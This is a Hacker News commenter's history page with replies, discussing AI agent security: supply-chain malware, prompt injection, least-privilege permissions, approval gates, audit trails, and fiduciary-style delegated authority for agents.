Hacker Newsnew | past | comments | ask | show | jobs | submit | agentictrustkit's commentslogin

The “LLMs don’t have responsibility” point is exactly why the interface matters. I as a person can be held to norms like not to run unknown code, but a model can't internalize that so you need the system to make the safe path the default.

Practically: assume every artifact the model touches is hostile, constrain what it can execute (network/file/process), and require explicit, reviewable approvals for anything that changes the world. I get that its boring but its the same pattern we already use in real life. That's why I'm skeptical of "let the model operate your computer" without a concrete authority model. the capability is impressive but the missing piece is verifiable and revocalbe permissioning.


One thing that jumps out in these incidents is how quickly we shift from "package integrituy" to "operator integrity." Once an LLM is in the loop (even as a helper0, its effectevly acting as an operator that can influence time-critical actions like who you contact, what you run, and what you trust.

In more regulated environments we deal with this by separating advice, authority and evidence (or the receipts). The useful analogue here is to keep the model in the "propose" role. but require deterministic gates for actions with side effects, and log the decisions as an auditable trail.

I personally don't think this eliminates the problem (attackers will still attack), but it changes the failure mode from "the assistant talked me into doing a danerous thing" to "the assistant suggested it and the policy/gate blocked it." That's the big difference between a contained incident and a big headline.


One downstream effect of "agents can publish code" is that the trust signals weve relied on for years (stars, maintainer reputation, issue history...etc) got noisier. I don't think that means the ecosystem collapses, but it could mean we need to separate provenance from popularity.

If an automated system is going to generate and then publish artifacts at scale, you gonna want a verifiable chain of custody. Like which principle authorized the pub, what policy constraints applied (I mean like license scanning, dependency allowlist...etc), an then what checks passed (tests, static analysis, supply-chain provenance). Without this the default consumer posture becomes "treat everything as untrusted," whidh is expensive and slow adoption of legitimate work too.

I suspect we end up with something like "signed built receipts" becoming normal for small projects as well, not because everyone loves ceremony, but becauses the alternative is an arms race of spam and counterfeit maintainers.


This is how I've come to think about it. It's less a "clever string that bypasses prompts" and more "untrusted parties are participating in your control plane." That's why purely linguistic defenses feel unsatisfying.

The architectural move that seems durable is separating capabiliity from authority. You can expose many tools (that's capability), but the agent only gets authority to invoke a narrow subset under well-defined conditions (that's the policy), and the authority needs to be revocable and auditable independently of whatever happens in that context. That's basically how we already run normal organiziations with people. Interns can see a lot but are limited on what they can do.

The practical side: Keep the model in a "Propose" role, keep execution in a deterministic gate (schema validation + policy engine + sandbox) and log the decision as a first-class artifact. What I mean by that is who or what authorized, what was considered, what side effect occured...etc. You still wont' get perfect security, but you can make the failure mode "agent asked for something dumb and got blocked" instead of "agent executied a side effect because a webpage told it to."


I like that everyone keeps separating "capability" from "authority" because they get conflated in a lot of agent-centered tooling.

CLI vs MCP choice mostly changes the HOW as a side effect. It doesn't answer the bigger question and probably harder one: who delegated the rigtht to cause that effect, for how long, and with what scope? Just like with people, you need a policy decision that's independent. It should be revocable and auditable.

One way that I look at it is with these long-running agents should look less like a script and more like an employee. You wouldn't give them the master key hoping they behave well. You'd give specific access and in stages probably. That's what I think we're missing with our agents is giving them appropriate authority, delegated by an owner with a audit trail


This is a perfect example of why supply chain is becomaing an agent problem or an agent governance problem. It's no longer just devops. We, humans, will notice things are off a bit maybe during an install or upgrade. Agents can't. They'll just intall whatever and then keep going, often with credentials loaded and tools enabled.

So what I've found to be useful or even critical is treating dependency changes as "authority changes." What I mean is upgrades and new transititive deps shouldn't be in the same permissions bucket as "normal" execution. You want to isolate the install/update into a separate job or identity with no access to production secrets. Secondly require an explicit allowlist or signed artifact for packages in the execution enviornemnt. Third, log who/hwat authorized this new code to run as a first-class audit event.

If agents are going to operate as we are tyring them to (unattended) then the question isn't only was the package malicious but it's also why was any unattended actor allowed to do what it did. Isn't this within our best interest?


I think this gets a lot worse when we look at it from an agentic perspective. Like when a dev person hits a compromising package, there's usually a "hold on, that's weird" moment before a catastrophe. An agent doesn't have that instinct.

Oh boy supply chain integrity will be an agent governenace problem, not just a devops one. If you send out an agent that can autonomously pull packages, do code, or access creds, then the blast radius of compromises widens. That's why I think there's an argument for least-privilege by default--agents should have scoped, auditable authority over what they can install and execute, and approval for anything outside the boundaries.


Initial person to report the malware to PyPI here. My cynical take is that it doesn't really matter how tightly scoped the agent privileges are if the human is still developing code outside of containers, with .env files lying around for the taking. I agree about agents not yet having the instincts to check suspicious behaviour. It took a bit of prodding for my CC to dig deeper and not accept the first innocent explanation it stumbled on.

Initially I rally had a bad taste in my mouth. It had forced me to close a business (video editing). Recently its gone a different direction so I would say the "interest" part got a resurgence for me. I'm seeing all of theses tools, people, and systems promise "can do this..." and "can do that..." but because I have a background in trust law and trust creation I've looked at things differently.

I think the "can do" part gets boring but now I'm paralleling this to trust relationships and fiduciary responsiblities. What I mean is that we can not only instruct but then put a framework around an agent much like we do a trustee where they are compelled to act in the best interests of the beneficiaries (the human that created them in this case).

Anyway it's got me thinking in a different way.


Fiduciary duty but for AI, interesting. I think there's some potential there, though of course you'll end up confronting the classic sci-fi trope of "what if the system judges what's best for the user in a way that is unexpected / harmful"? But, solve that with strong guardrails and/or scoping and you might have something.

The web of trust question is the right one. The hard part isn't flagging obviously malicious knowledge units — it's establishing verifiable authority for the agents contributing them. Like...Who authorized agent-1238931 to participate? What scope does it have? Can its contributions be traced back to a their human who takes responsibility? This maps to a broader pattern: we're building capability (what agents can do) much faster than accountability (who authorized them and within what limits). Delegation chains where each agent's authority derives from a verifiable person (principal) would help a lot here. Trust law has dealt with this exact problem for centuries — the concept of a fiduciary acting within scoped, revocable authority. We just haven't applied that thinking to software yet imo.

This is exactly right. We implemented delegation receipts — Agent A grants scoped authority to Agent B, producing a signed receipt. B's subsequent actions reference A's delegation receipt. An auditor can trace the full chain from human principal to agent action.

The fiduciary analogy is spot on. Every receipt in the chain is independently verifiable: npx @veritasacta/verify --self-test


The fiduciary analogy goes further than most people realize. Tax law already has a well-developed framework for exactly this: an agent transacting on behalf of a principal can create tax obligations for that principal — nexus, withholding, 1099 reporting — regardless of whether the principal knew the transaction happened. The accountability gap you're describing isn't just a trust engineering problem, it's already a legal exposure problem. If agent-1238931 makes a taxable sale in a state where its principal has no nexus, someone still owes that tax. We haven't figured out who yet.

my core thesis is that AGI is here, it just needs accountability and efficient frameworks to navigate our arbitrary world

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: